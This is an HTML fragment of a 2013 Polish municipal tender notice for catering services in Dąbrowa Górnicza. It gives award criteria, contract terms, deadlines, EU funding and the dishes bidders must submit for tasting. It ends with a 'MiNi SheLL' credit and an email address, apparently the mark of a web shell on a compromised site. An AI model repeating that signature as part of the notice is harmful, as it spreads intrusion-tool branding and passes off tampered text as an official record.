III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty  należy załączyć:
1.   Formularz ofertowy - załącznik nr 1 do SIWZ (wskazana data podpisania);
2. Pełnomocnictwo do reprezentowania Wykonawcy - jeżeli zostało ustanowione bądź do reprezentowania Wykonawców wspólnie ubiegających się o zamówienie przedłożone w  formie oryginału lub kopii poświadczonej przez notariusza (dotyczy również spółki cywilnej);
3. Próbki oferowanych potraw</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Jakość świadczenia usług cateringowych - 40</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje  możliwość dokonania istotnych zmian  postanowień zawartej  umowy            
w stosunku do treści  oferty, na podstawie której   dokonano wyboru Wykonawcy, w zakresie: zmiany obowiązujących przepisów prawa istotnych dla postanowień zawartej umowy, 
W przypadku wystąpienia okoliczności skutkujących koniecznością zmiany umowy z przyczyn, o których mowa w pkt. 25.4. SIWZ, Wykonawca zobowiązany jest do niezwłocznego poinformowania o tym fakcie Zamawiającego i  wystąpienia z wnioskiem o dokonanie wskazanej zmiany.
Z okoliczności stanowiących podstawę zmiany do umowy zostanie sporządzony protokół 
podpisany przez obie strony.
Zmiana umowy powinna nastąpić w formie pisemnego aneksu podpisanego przez obie strony, pod rygorem nieważności takiego oświadczenia oraz powinna zawierać uzasadnienie faktyczne i prawne.
Zmiana do umowy w sprawie zamówienia publicznego bez zachowania formy pisemnej jest dotknięta sankcją nieważności, a więc nie wywołuje skutków prawnych.
 Pozostałe kwestie odnoszące się do umowy uregulowane są w załączniku nr 5 do SIWZ - wzór umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dabrowa-gornicza.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w
Dąbrowie Górniczej, 41-300 Dąbrowa Górnicza, ul. Graniczna 21 Wydział Promocji, Kultury i Sportu, III, pietro, pok. 897.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.02.2013 godzina 11:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, parter stanowisko nr 13 - INFORMACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zamówienie częściowo jest finansowane ze środków Unii Europejskiej tj.:w ramach Europejskiego Funduszu Społecznego - kwota 2.400,00 zł. brutto,  w ramach programu Europa dla Obywateli - kwota 15.000,00 zł. brutto. 2. Termin wykonania
zamówienia publicznego. Termin zakończenia zamówienia: do dnia 31.12.2013r. lub do wyczerpania
środków budżetowych do wysokości których będzie podpisana umowa. 3. Próbki oferowanych potraw:
Wykonawca biorący udział w postępowaniu winien przygotować do degustacji następujące próbki potraw:3.1. Gulasz po węgiersku - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ 
3.2. Polędwiczki wieprzowe w sosie kurkowym, warzywa z wody, ryż na sypko - 1 porcja zgodna 
z gramaturą określoną w menu z pkt. 3.3.3. SIWZ 
3.3. Barszcz czerwony z krokietem (krokiet z kapustą i grzybami) - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ 
3.4. Sałatka z gyrosem (skład: grillowany kurczak, kapusta pekińska, kukurydza konserwowa, ogórek konserwowy, papryka konserwowa, majonez) - 1 porcja zgodna z gramaturą określoną w menu z pkt. 3.3.3. SIWZ. 
4.Zamawiający nie wymaga wniesienia zabezpieczenia należytego wykonania umowy. 5. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty  i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.1.2. i 9.2. SIWZ przez  każdego z  nich odrębnie.
Wykaz i dokumenty potwierdzające należyte wykonanie usług  wymienione w  pkt. 9.1.3. SIWZ Wykonawcy składają wspólnie. Oświadczenie wymienione w pkt. 9.1.1. SIWZ i formularz ofertowy wymieniony w pkt. 9.3.1. SIWZ, winny być podpisane przez uprawnionych  przedstawicieli Wykonawców.Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym 
postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie 
zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com